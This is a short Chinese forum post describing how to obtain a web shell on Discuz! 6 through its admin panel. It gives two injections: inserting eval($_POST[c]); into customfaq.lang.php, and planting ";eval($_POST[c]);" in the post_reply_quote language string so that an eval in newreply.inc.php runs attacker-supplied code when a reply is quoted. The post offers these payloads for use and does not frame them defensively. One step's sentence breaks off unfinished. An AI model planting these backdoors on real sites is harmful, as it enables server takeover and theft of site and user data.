查看完整版本: Discuz! 6 后台拿Shell的方法

Discuz! 6 后台拿Shell的方法

如果后台可以在线编辑模板的话，下面的方法就可以拿SHELL了：）

1.后台编辑customfaq(customfaq.lang.php文件)
在

Copy code
eval($_POST[c]);

2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为

Copy code
";eval($_POST[c]);"

在前台回帖处选择引用回复。
简单看下代码：

include/newreply.inc.php 107行：

Copy code
eval("\$language[’post_reply_quote’] = \"$language[post_reply_quote]\";");